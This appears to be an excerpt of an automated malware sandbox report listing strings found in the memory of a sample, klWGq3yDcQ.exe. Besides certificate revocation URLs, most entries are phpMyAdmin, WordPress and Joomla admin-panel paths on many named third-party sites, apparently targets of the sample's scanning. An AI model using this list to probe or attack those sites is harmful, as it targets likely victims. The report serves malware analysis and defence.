Source: klWGq3yDcQ.exe, 00000001.00000002.2884974422.0000000003FC9000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2887494759.00000000043C8000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886351105.0000000004122000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886351105.00000000040EF000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2887494759.00000000043C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003B74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl5
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003CF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crlcrlJ
Source: klWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000004005000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crlhu
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.000000000409A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.000000000409A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crln.php
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl.
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/GeoTrustEVRSACAG2.crl04
Source: klWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000004005000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl
Source: klWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000004005000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl
Source: klWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000004005000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl8t
Source: klWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000004005000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.0000000004075000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2887494759.00000000043C8000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886351105.0000000004122000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2887027217.00000000042A7000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886351105.00000000040EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertCloudServicesCA-1-g1.crl0
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003B74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl
Source: klWGq3yDcQ.exe, 00000001.00000002.2884974422.0000000003FC9000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2887494759.00000000043C8000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886351105.0000000004122000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886351105.00000000040EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003B74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crlM
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004139000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crlNh
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/GeoTrustEVRSACAG2.crl0J
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.0000000004300000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2888110543.0000000004A1D000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004218000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.0000000004319000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://daisyokogyo.co.jp/
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003C87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://daisyokogyo.co.jp/PhpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003C87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://daisyokogyo.co.jp/phpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003C87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://daisyokogyo.co.jp/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003C87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://daisyokogyo.co.jp/phpmyadmin/m
Source: klWGq3yDcQ.exe, 00000001.00000002.2887494759.00000000043BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dbschooldelhi.ac.in/
Source: klWGq3yDcQ.exe, 00000001.00000002.2887494759.00000000043BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dbschooldelhi.ac.in/0
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003C6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://digdig.org/wp-login.php
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.000000000425C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://directlendersllc.com/PhpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.000000000425C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://directlendersllc.com/phpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.000000000425C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://directlendersllc.com/phpMyAdmin/Q
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.000000000425C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://directlendersllc.com/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.000000000425C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://directlendersllc.com/pma/
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.000000000425C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://directlendersllc.com/pma/k
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.000000000405D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dkrs.gov.ua/
Source: klWGq3yDcQ.exe, 00000001.00000002.2887494759.00000000043B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dstaq.com/PhpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2887494759.00000000043B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dstaq.com/phpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2887494759.00000000043B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dstaq.com/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2887494759.00000000043C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dstaq.com/pma/
Source: klWGq3yDcQ.exe, 00000001.00000002.2887494759.00000000043C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dstaq.com/pma//phpmyadm
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eco-landeck.at/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eco-landeck.at/.comsO
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eco-landeck.at/pma/
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003D05000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://edgewater.group/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://elitebusinesshn.com/admin
Source: klWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000004005000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://elitebusinesshn.com/admin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000004005000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://elitebusinesshn.com/admin/BsdW1hcnVuaWZvcm1lcy5jb20ATHV
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://elitebusinesshn.com/adminOGIN
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://esistem.com.br/
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.0000000004067000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://esoft.academy/
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.0000000004067000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://esoft.academy/.com:2222
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://formacion.talentius.com/
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gasp-ga.com/administrator/
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gasp-ga.com/administrator/20
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gasp-ga.com/administrator/index.php
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gasp-ga.com/administrator/index.phpp-
Source: klWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000004025000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatewaytoearlylearning.com/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gatewaytoearlylearning.com/wp-admin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.000000000405D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gccb.co.in/
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.000000000405D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gccb.co.in/ministrator/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gethsemane.org/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gethsemane.org/PhpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gethsemane.org/ac.uk
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gethsemane.org/phpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gethsemane.org/phpMyAdmin/c
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gethsemane.org/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gethsemane.org/phpmyadmin/H
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gethsemane.org/pma/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gethsemane.org/pma/.com
Source: klWGq3yDcQ.exe, 00000001.00000002.2887494759.00000000043C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gmail.io/
Source: klWGq3yDcQ.exe, 00000001.00000002.2887494759.00000000043C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gmail.io/)
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gmail.io/administrator/index.php
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gmail.io/administrator/index.php1
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.0000000004075000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2887067492.0000000004380000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gmpg.org/xfn/11
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://grantstech.io/PhpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://grantstech.io/PhpMyAdmin/(-V
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://grantstech.io/phpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://grantstech.io/phpMyAdmin/T-
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://grantstech.io/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://greenrworld.com/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://greenrworld.com/PhpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://greenrworld.com/phpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://greenrworld.com/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://greenrworld.com/ta.eu
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.000000000405D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gruporegiosafety.com/
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.000000000425C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gruporegiosafety.com/PhpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.000000000425C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gruporegiosafety.com/phpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.000000000425C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gruporegiosafety.com/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.000000000425C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gruporegiosafety.com/pma/
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.000000000425C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gruporegiosafety.com/pma/a
Source: klWGq3yDcQ.exe, 00000001.00000002.2886351105.00000000040EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gruporegiosafety.com/wp-login.php
Source: klWGq3yDcQ.exe, 00000001.00000002.2886351105.00000000040EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gruporegiosafety.com/wp-login.phpen)
Source: klWGq3yDcQ.exe, 00000001.00000002.2886351105.00000000040EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gruporegiosafety.com/wp-login.phpen)f
Source: klWGq3yDcQ.exe, 00000001.00000002.2886351105.00000000040EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gruporegiosafety.com/wp-login.phpm
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.000000000405D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://harasduberry.com/
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.000000000405D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://highstreet-re.com/
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003D22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hightideinc.com/
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.0000000004075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hightideinc.com/PhpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.0000000004075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hightideinc.com/phpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.0000000004075000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hightideinc.com/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.0000000004067000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hightideinc.com/pma/
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003D22000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://himontessori.com/
Source: klWGq3yDcQ.exe, 00000001.00000002.2886351105.00000000040EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://himontessori.com/PhpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://himontessori.com/administrator/
Source: klWGq3yDcQ.exe, 00000001.00000002.2886351105.00000000040EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://himontessori.com/phpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2886351105.00000000040EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://himontessori.com/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.000000000405D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://himontessori.com/pma/
Source: klWGq3yDcQ.exe, 00000001.00000002.2887494759.00000000043C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hmichaelandco.com/PhpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2887494759.00000000043C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hmichaelandco.com/phpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2887494759.00000000043C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hmichaelandco.com/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2884974422.0000000003FAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hmichaelandco.com/pma/
Source: klWGq3yDcQ.exe, 00000001.00000002.2884974422.0000000003FAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hmichaelandco.com/pma/V
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.0000000004067000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ibright.net/
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.00000000043B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://integraledu.hr/
Source: klWGq3yDcQ.exe, 00000001.00000002.2887067492.00000000043B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://integraledu.hr/?
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://integraledu.hr/administrator/index.php
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://integraledu.hr/administrator/index.php#y
Source: klWGq3yDcQ.exe, 00000001.00000002.2886296265.00000000040D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://integraledu.hr/pma/
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jamiesonmullin.com/admin.php
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004222000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jamiesonmullin.com/admin.phph/I
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jamiesonmullin.com/administrator/index.php
Source: klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://jamiesonmullin.com/administrator/index.phpmOq
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://killicit.com/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://killicit.com/PhpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://killicit.com/PhpMyAdmin/7o
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://killicit.com/n.comm
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://killicit.com/phpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://killicit.com/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://killicit.com/phpmyadmin/$o
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://killicit.com/pma/
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.000000000405D000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://knu.ac.in/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://knu.ac.in/0e.orgxyz
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://knu.ac.in/PhpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://knu.ac.in/phpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://knu.ac.in/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://knu.ac.in/pma/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://knu.ac.in/pma/ld.edu.au
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://krkconcord.com/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://krkconcord.com/.at
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://krkconcord.com/PhpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://krkconcord.com/phpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://krkconcord.com/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://krkconcord.com/pma/
Source: klWGq3yDcQ.exe, 00000001.00000002.2881610606.0000000003BA1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kvsroraipur.in/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000004005000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://leeberg.dk/administrator/index.php
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003C87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lgs-strategies.com/PhpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003C87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lgs-strategies.com/phpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003C87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lgs-strategies.com/phpMyAdmin/-v
Source: klWGq3yDcQ.exe, 00000001.00000002.2883538020.0000000003C87000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lgs-strategies.com/phpmyadmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000004005000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://linkan-group.com/wp-admin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000004005000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://linkan-group.com/wp-admin/com/wp-login.php5p7c
Source: klWGq3yDcQ.exe, 00000001.00000002.2885992508.000000000405D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://locandafrancigena.it/
Source: klWGq3yDcQ.exe, 00000001.00000002.2887494759.00000000043C2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lumaruniformes.com/PhpMyAdmin/
Source: klWGq3yDcQ.exe, 00000001.00000002.2885555706.0000000004005000.00000004.00000020.00020000.00000000.sdmp, klWGq3yDcQ.exe, 00000001.00000002.2886486906.0000000004158000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lumaruniformes.com/administrator/index.php
